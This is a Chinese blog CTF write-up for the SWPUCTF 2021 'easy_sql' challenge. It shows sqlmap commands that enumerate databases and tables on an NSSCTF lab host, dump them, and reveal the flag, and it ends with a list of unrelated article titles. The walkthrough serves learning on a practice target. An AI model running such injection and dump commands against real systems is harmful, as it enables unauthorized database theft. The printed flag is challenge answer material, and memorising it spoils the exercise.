当前位置: 首页 > news >正文

[SWPUCTF 2021 新生赛]easy_sql的write up

开启NSSCTF靶场,在浏览器中访问链接,看到让我们输入点什么还有标签页名字提示:

"参数是wllm"

直接/?wllm=1访问一下:

这里就直接用sqlmap直接爆破了:

查看数据库有哪些:

python sqlmap.py -u "http://node4.anna.nssctf.cn:28961/?wllm=1" --dbs

看到test_db就是这个数据库,其他数据库都是sql数据库的必要四个数据库,接下来就查看test_db数据库的表有哪些


查看test_db数据库的表名有哪些:

python sqlmap.py -u "http://node4.anna.nssctf.cn:28961/?wllm=1" -D test_db --tables

一眼就看出test_tb这个表很关键,接下来就查看一下这个test_tb表的信息


查看test_db数据库的test_tb表的所有数据:

python sqlmap.py -u "http://node4.anna.nssctf.cn:28961/?wllm=1" -D test_db -T test_tb --dump

很轻松的看出test_db表有flag列,flag列的内容就是题目所求的flag:

NSSCTF{05010966-5970-49bc-bdfd-b244ca7756cb}


http://www.mrgr.cn/news/62244.html

相关文章:

  • 继承超详细介绍
  • 聊聊 Mongod 以及 MongoDB 常用命令
  • c#多线程之生产者-消费者模型
  • 运算符 - 算术、关系、逻辑运算符
  • C++线程、并发、并行
  • 重温设计模式--8、命令模式
  • 虚拟机Ubuntu实现和宿主机之间的数据传输(只能复制粘贴,包过)
  • JVM系列之内存布局
  • RK3568平台(PWM篇)红外遥控适配
  • 高效构建仓库AGV管理系统:基于Python的路径规划与货架管理
  • 电动车进入电梯数据集、自行车进入电梯数据集 电动车进入电梯VOC数据标注数据集
  • 带你用Go实现二维码小游戏(中)
  • Java AQS 源码
  • 利用双指针法解题
  • RNN在训练中存在的问题
  • 大模型入门综述---从模型,训练,部署全方面认识大模型
  • 如何解决Matplotlib报错:none of the following families were found: SimHei
  • ReactNative Fabric渲染器和组件(5)
  • 统信UOS下启动图形界面应用工具monitor报JAVA相关错:An error has occurred. See the log file
  • 《高频电子线路》 —— 高频谐振功放
  • RK3568平台开发系列讲解(I2C篇)I2C 上拉电阻
  • 统信UOS下启动图形界面应用工具manager报错:No protocol specified的解决办法
  • 不使用三方软件,win系统下禁止单个应用联网能力的详细操作教程
  • C语言实现堆排序
  • Redis 线程控制 问题
  • C语言实现选择排序